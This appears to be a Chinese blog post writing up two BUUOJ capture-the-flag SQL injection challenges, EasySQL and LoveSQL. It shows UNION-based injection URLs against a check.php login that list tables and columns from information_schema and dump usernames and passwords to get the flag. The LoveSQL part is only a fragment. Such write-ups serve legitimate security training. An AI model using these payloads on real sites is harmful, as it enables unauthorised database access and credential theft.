[BUUOJ]两道简单的SQL注入(EasySQL与LoveSQL)

架构大数据双料架构师

 关注

阅读 79

2022-10-27


文章目录

  • ​​EasySQL​​
  • ​​LoveSQL​​


前言:有时候使用#符号会没用,可以用url编码代替%23,基础注入与报错注入都可以解除来这两道题,判断是否为字符型懒得记录下来

EasySQL

通过order by得到有3列

​/check.php?username=1' union select 4,2,3%23&password=1​

[BUUOJ]两道简单的SQL注入(EasySQL与LoveSQL)_url编码


得到回显点位为2和3,查询当前数据库名及版本

开始爆表

​/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1​

[BUUOJ]两道简单的SQL注入(EasySQL与LoveSQL)_url编码_02


​/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1​

[BUUOJ]两道简单的SQL注入(EasySQL与LoveSQL)_php_03


得到数据与Flag:

​/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1​

LoveSQL

至于是数字型还是字符型不想写下来记录

首先利用order by查出有三列

迷惑行为,非预期解

[BUUOJ]两道简单的SQL注入(EasySQL与LoveSQL)_php_04


相关推荐

两道简单的Perl编程题

独孤凌雪 82 0 0

两道题目

罗子僧 70 0 0

汇编的两道题

全栈学习笔记 21 0 0

两道考研试题

炽凤亮尧 77 0 0

蓝牙安全入门——两道CTF题目复现

王老师说 9 0 0

百度脚本笔试题两道

攻城狮Chova 169 0 0

“下沉市场”+“内容生态”,OTA的两道救命题?

冬冬_79d4 104 0 0

习题笔记(每天至少更新两道题)(二)

暮晨夜雪 41 0 0

每天刷两道题——第三天

洛茄 14 0 0

【算法笔记】深入理解dfs(两道dp题)

数数扁桃 13 0 0

精彩评论(0)

0 0 举报